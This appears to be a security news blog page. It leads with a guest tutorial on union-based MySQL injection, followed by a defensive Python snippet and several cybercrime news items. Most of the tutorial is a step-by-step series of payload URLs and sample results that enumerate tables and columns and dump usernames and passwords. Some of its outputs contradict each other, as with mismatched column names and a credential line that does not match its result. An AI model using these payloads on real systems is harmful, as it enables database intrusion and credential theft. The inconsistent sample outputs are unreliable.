
We Are The Best Tool For Web Application Security (Discovering The Infamous Sql-injection Technique) 

Today I am proudly sharing an article by Mr. Rafael Souza, a great admirer and fan of VOGH, who has gladly shared his brilliant research paper on SQL injection (MySQL) with us. Rafael is very passionate about the cyber security domain and is keenly involved with the GreyHat Community and Maintainer design of Brazilian Backtrack Team. So without wasting time, let's go and see what Rafael has for us:

Discover The Infamous MySQL Injection Technique 
                                                                                        
ABSTRACT:
It is known that computers and software are developed and designed by humans, and human error is a reflection of a mental response to a particular activity. Did you know that numerous inventions and discoveries are due to misconceptions?
There are levels of human performance based on the behavior of the mental response. To explain more comprehensively: we humans tend to err, and for this reason we are the best tool for finding these errors; even the software used for vulnerability analysis and scanning was built by us.
                                                                                                       
Understand the technique MySQL Injection: 
One of the fraud techniques best known to web developers is SQL injection. It is the manipulation of a SQL statement through the variables that make up the parameters received by a server-side script. It is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements into a query by manipulating the input data of an application.

STEP BY STEP
 
(Figure 1) Detecting
Searching for the number of columns: we test first with an error, then without an error, to find it.
(Figure 2) SQL Error 
Host Information,
Version of MySQL system used on the server.
(Figure 3) Host Information
(Figure 4) Location of the Files
Current database connection used between the "input" to the MySQL system
(Figure 5) Users of MySQL
(Figure 6) Current Time
Brute Force or Shooting
This happens in versions below 5.x.y
(Figure 7) Testing

Dump: This happens in versions 5.x.y and up [ 1st Method ]
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--
usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2nd Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--
CHARACTER_SETS
or
Unknown column 'CHARACTER_SETS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 1,2--
COLLATIONS
or
Unknown column 'COLLATIONS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 16,17--
usuarios
or
Unknown column 'usuarios' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18--
rafael
or
Unknown column 'rafael' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Searching Column (s) of a given table
* Brute Force / Shooting
This happens in versions below 5.x.y
http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--
_Rafa_
or
Unknown column '_Rafa_' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--
rafael1337
or
Unknown column 'rafael1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1

=--------------------------=--------------------------=--------------------------=--------------------------=
Dump
This happens in versions 5.x.y and up [ 1st Method ]

"usuarios" hexadecimal -> "7573756172696f73"

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--
login,passwd,id,texto
or
Unknown column 'login,passwd,id,texto' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2nd Method ]

"usuarios" decimal -> "117,115,117,97,114,105,111,115"

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--
login
or
Unknown column 'login' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 1,2--
passwd
or
Unknown column 'passwd' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 2,3--
id
or
Unknown column 'id' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 3,4--
texto
or
Unknown column 'text' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Extracting data from the columns of a given table
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337
or
Unknown column '_Rafa_ : fontes1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios--
_RHA_ : infosec1337
or
Unknown column '_RHA_ : infosec1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1

=--------------------------=
Concat
group_concat() => search all you want with ASCII characters
concat() => search what you want with ASCII characters
concat_ws() => unite

Hexadecimal
0x3a => :
0x20 => space
0x2d => -
0x2b => +

Readers, this article is for educational purposes only. I could continue explaining how to exploit web sites, but that is not my intention.
It is known that the impact of this manipulation may be unauthorized access to a restricted area, imperceptible to the eye of an inexperienced developer; it may also allow the deletion of a table, compromising the entire application, among other effects. So I want to emphasize that this paper is for security researchers and developers, so that they beware and test their code.

CONCLUSION
Many companies keep important information on their websites and databases. Information is the most valuable asset, and it is intangible. The question is: how are developers dealing with this huge responsibility?
The challenge is to develop increasingly innovative sites, coupled with mechanisms that provide security to users.
The purpose of this paper is to present what SQL injection is, how applications are exploited, and techniques for testing, allowing the developer to build a more robust system and understand the vulnerability.
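
As a test a developer can run against their own code, here is an added example (not from Rafael's paper) of the fix for the unquoted, numeric `string=` parameter the article targets. Because the value sits outside quotes, escaping quotes changes nothing; binding the value as a parameter, or validating it as an integer first, does. Python's `sqlite3` stands in for MySQL, and the `artigos` table, its columns and all data are constructed assumptions.

```python
import re
import sqlite3

# Request value in the shape the article sends to query.php?string=
# (column count and table name as in its examples).
ARTICLE_VALUE = "1 union all select 1,2,3,4,login from usuarios--"

BASE_QUERY = "SELECT id, titulo, autor, data, corpo FROM artigos WHERE id = "


def make_db():
    """Constructed data: 'artigos' is a hypothetical 5-column public table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE artigos (id INTEGER, titulo TEXT, autor TEXT, data TEXT, corpo TEXT);
        INSERT INTO artigos VALUES (1, 'Title', 'Author', '2013-01-01', 'Public text');
        CREATE TABLE usuarios (login TEXT, senha TEXT);
        INSERT INTO usuarios VALUES ('demo_login', 'demo_secret');
    """)
    return db


def lookup_concatenated(db, value):
    """The 'before': the request value is pasted into the SQL text."""
    return db.execute(BASE_QUERY + value).fetchall()


def lookup_escaped(db, value):
    """Quote escaping only: no effect, the value never sits inside quotes."""
    return db.execute(BASE_QUERY + value.replace("'", "''")).fetchall()


def lookup_bound(db, value):
    """Bound parameter: the whole value is compared to id as data."""
    return db.execute(BASE_QUERY + "?", (value,)).fetchall()


def lookup_validated(db, value):
    """Reject anything that is not a short run of digits, then bind an int."""
    if not re.fullmatch(r"[0-9]{1,9}", value):
        raise ValueError("string parameter must be a positive integer")
    return db.execute(BASE_QUERY + "?", (int(value),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", lookup_concatenated(db, ARTICLE_VALUE))
    print("escaped:     ", lookup_escaped(db, ARTICLE_VALUE))
    print("bound:       ", lookup_bound(db, ARTICLE_VALUE))
    print("validated:   ", lookup_validated(db, "1"))
```
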
**********
I hope you all will enjoy the above article, as I did. On behalf of the entire VOGH Team, I sincerely thank Mr. Rafael Souza for his remarkable contribution.
To get more such exclusive research papers, along with all kinds of breaking cyber updates from across the globe, just stay tuned with VOGH.


Edward Pearson (23 Years Aged Hacker) Sent To Jail For Stealing 8Million Customers Banking & PayPal Details

A 23-year-old hacker from the UK named Edward Pearson has been sent to prison for pilfering eight million personal identities (ID fraud). Between January 1 2010 and August 30 2011, he used malicious computer programs to get his hands on - wait for it - eight MILLION personal identities. According to reports, he used highly sophisticated cyber-weapons such as Zeus and SpyEye to hunt down personal details on the Internet.
One of his programs scanned through 200,000 accounts registered to online payment service PayPal - identifying names, passwords and current balances. Luckily, Pearson got caught after making only £2,400 ($3,800 USD). The authorities estimate he could have walked away with as much as £800,000 ($1.3M USD). Authorities were alerted to the problem when his 21-year-old girlfriend, Cassandra Mennim, used stolen credit cards to book rooms at the upmarket Cedar Court Grand and Lady Anne Middleton Hotels. Investigators looking into the case eventually identified him as G-Zero on hacking forums. Pearson has been jailed for 26 months, whilst girlfriend Cassandra Mennim admitted two counts of obtaining services dishonestly and was given 12 months' supervision.


-Source (NS & DailyMail)



Philippines Becomes Haven for Organized Cybercrime (Pornography, Cyber Sex Dens, Online Gambling, CC Fraud and ID Theft)

A top Philippine National Police official said the country has become a “haven” for transnational organized crime syndicates involved in cyber pornography, cyber sex dens, illegal online gambling, credit card fraud and identity theft due to weak laws against cyber crimes and the poor technical know-how of law enforcers.
Chief Superintendent Samuel Pagdilao Jr., director of the PNP Criminal Investigation and Detection Group (CIDG), said cyber-crime mafias, mostly foreigners, have established their base of operations in the Philippines. Pagdilao said cyber-crime operators have taken advantage of the PNP’s “organizational and technical incapability” to fight cyber crimes.
While cyber-crime syndicates use sophisticated technology, he rued that “law enforcers in the country are lagging behind in terms of training and equipment.”
Pagdilao asked Congress to prioritize passing the proposed cyber-crime prevention law to address the country’s legal inadequacies. He also asked the PNP to support the organizational and technical capability build-up of the CIDG’s cyber-crime unit. Pagdilao said foreign mafias have been running cyber-sex dens and cyber-pornography operations in the country. He said Korean mafias have been behind illegal online gambling and credit card fraud operations in the country.
Pagdilao said their recent arrest here of a Korean hacker wanted by Interpol revealed that “Korean cyber-crime syndicates are operating almost unhampered” in the country.


Star Wars Galaxies Fan Site Hacked (21,000 Email-id & 23,000 Passwords Stolen)


A Star Wars Galaxies fan site got hacked today and thieves stole 21,000 email addresses and 23,000 passwords. And judging from an analysis of the passwords, most of them were weak. The site SWGalaxies.net is a fan site owned by LFNetwork, an independently owned network of LucasArts fan sites. Hackers from the group ObSec, a small hacking collective with apparent sympathies for the LulzSec and AntiSec hacktivist groups, broke into the site’s security and posted the addresses and passwords on the web. While a compromised forum login isn’t itself a big deal, the threat from this kind of smaller breach is that it can lead to further identity theft that could be devastating for individuals — particularly if they’re reusing the same passwords at other, more critical websites.
Jeff Moeller, editor of LFNetwork, said that the site that got hacked is not actively maintained any more. The fan site targets males 18 to 34 years old, and evidently none of the other UGO or IGN sites were targeted.

According to the identifier Report:-

“It’s unfortunate,” said Todd Feinman, chief executive of Identity Finder, in an interview. “It must be so frustrating for someone to see their passwords online, given the amount of online sign-ups we have to do.”

Of the 23,389 passwords stolen, 71 percent were weak. Only 13 percent of the passwords were strong. The average password length was 7.6 characters. About 4.3 percent of the passwords were less than 5 characters, and only 4.7 percent of the passwords were more than 10 characters long.
Hacking a game web site password isn’t too big a deal. But the problem is that users often reuse their passwords on more important sites, like online banks. Studies show that 50 percent of passwords are reused.
Feinman said, “Passwords are a digital identity and password reuse is a serious problem that could lead toward identity fraud.”
One of the users had a password that was 42 characters long. That person took trouble to protect himself or herself. But since the web site stored the passwords in an unencrypted format, the password is out there for everyone to see now.

-News Source (Games Beat & Star Galaxy)


One Out of Four Online Criminals Is an FBI Informer


One in four computer hackers is secretly working for the FBI and U.S. secret service to inform on their peers, it has been claimed. By threatening long prison sentences, officers have managed successfully to infiltrate communities of the online criminals, recruiting a huge number of informants.
The moles, who are already embedded deep inside the hacking community, are then reporting back to the FBI about large-scale identity fraud in an attempt to earn themselves softer sentences. Some major illegal forums where hackers sell stolen credit card details and forged identities are even being run by the FBI moles, it has been claimed. The management of other sites has been taken over by FBI agents posing as ID theft specialists, or 'carders', where they can use the intelligence to land genuine hackers with lengthy jail sentences. It is thought their work has already managed to put dozens of online criminals in jail - leaving the underground hacking world riddled with paranoia about infiltration. Eric Corley, who publishes 2600, the hacker quarterly, told the Guardian that as many as a quarter of all hackers in the U.S. may have been recruited by authorities as moles. 'Owing to the harsh penalties involved and the relative inexperience with the law that many hackers have, they are rather susceptible to intimidation,' he said.
John Young, who runs Cryptome, a website similar to WikiLeaks that attempts to publish secret documents, added: 'It makes for very tense relationships. There are dozens and dozens of hackers who have been shopped by people they thought they trusted.' Among many convictions is the extremely high-profile case of Bradley Manning, who is being held on suspicion of passing on documents to WikiLeaks.
He was shopped to authorities by Adrian Lamo, a convicted hacker turned informant.
Lamo, who is viewed in online communities as a 'Judas' and has been called 'the world's most hated hacker', has said: 'Obviously it's been much worse for him but it's certainly been no picnic for me. He followed his conscience, and I followed mine.'
Barrett Brown, a spokesman for the 'hacktivist' group Anonymous, told the Guardian: 'The FBI are always there. They are always watching, always in the chatrooms. You don't know who is an informant and who isn't, and to that extent you are vulnerable.'
Kevin Poulsen, senior editor at Wired magazine, added: 'We have already begun to see Anonymous members attack each other and out each other's IP addresses.
'That's the first step towards being susceptible to the FBI.'


Phishing: E-Mail Needs Authentication

In the wake of the Epsilon breach, organizations have taken the lead to notify consumers, telling them their e-mail addresses have been exposed and linked to information that could subject them to phishing attacks.
The breach highlights the increasing sensitivity of e-mail. "E-mail addresses have been vulnerable since e-mail addresses were created," says Rohrbaugh, vice president of information security for Intersections Inc.
Rohrbaugh says phishing attacks are increasing and provide the best means for fraudsters to get their hands on consumers' identities -- which inevitably leads to fraud. "Social engineering is a very successful tool for the criminal," he says. "Phishing is more sophisticated." It's come a long way since the early days of "shotgun" phishing. Today's attacks are targeted.
In this interview [transcript below], Rohrbaugh discusses:
  • Online security;
  • Consumer responsibility for online safety and the protection of personal information;
  • E-mail server authentication.
Rohrbaugh is a technologist with more than 20 years of government and private sector experience. Rohrbaugh's security career started in the military and continued under government projects for CSC at NATO, DISA, NMRC as an architect; and ST&E team lead and instructor for information security. After entering the private world and working for Metamor WW, Rohrbaugh started an e-business consulting firm that served the U.S. and Europe. Rohrbaugh then brought his information security experience to the financial sector and joined Intersections, which provides identity theft solutions to financial institutions in North America. Rohrbaugh's main focus is anti-fraud, ID verification (U.S. Patent holder) and security architecture.

Phishing: Social Engineering

TRACY KITTEN: Phishing attack concerns have been heightened by the Epsilon e-mail breach, which is believed to have exposed countless consumer e-mail addresses affiliated with loyalty programs and marketing campaigns. How vulnerable are we to phishing and subsequently ID theft when fraudsters have access to e-mail addresses and affiliations that link those addresses to other information? I'm here today with Tim Rohrbaugh, vice president of Information Security for Intersections Inc., which provides the recovery service for the Identity Theft Assistance Center. Tim, can you give our audience just a general idea about the state of phishing generally?

TIM ROHRBAUGH: Phishing is simply a form of social engineering. Humans have been manipulating other humans for the purposes of gaining confidential information since we first started to communicate. The job of social engineering today is made a little bit easier, because a lot of our evolved defenses are rendered useless. You can look at a person and make a characterization about whether they are a male or a female if they're in front of you, or maybe you know if they look confident or desperate, and those things are not available to you when you're dealing with e-mail. So, now we have to respond to an e-mail or a text and react in the same way if facing somebody in person. With e-mail, as a communication medium, all we have to look for is a sender's name. The links, which can be covertly hidden within the mail message itself, have to be recognized as legitimate or not -- whether they are leading off some place that you didn't suspect. The other thing to look for is the e-mail time link. Is it in context? Did we just recently read from our financial institution or local government that they would never send an e-mail asking for this information. These are all things that we're trying to evaluate when the e-mail comes in and determine what we're going to do. Today there is still not a good indication that the e-mail is from a verified source. The mail servers in between are trying to do authentication, but it's not fully implemented around the network. The junk mail filters work part of the time, but phishing attacks have changed a little bit.
KITTEN: How have phishing attacks advanced? And when I talk about the advancement of phishing attacks, I'm talking about beyond just phishing links. What other types of techniques are fraudsters using to hijack personal information?
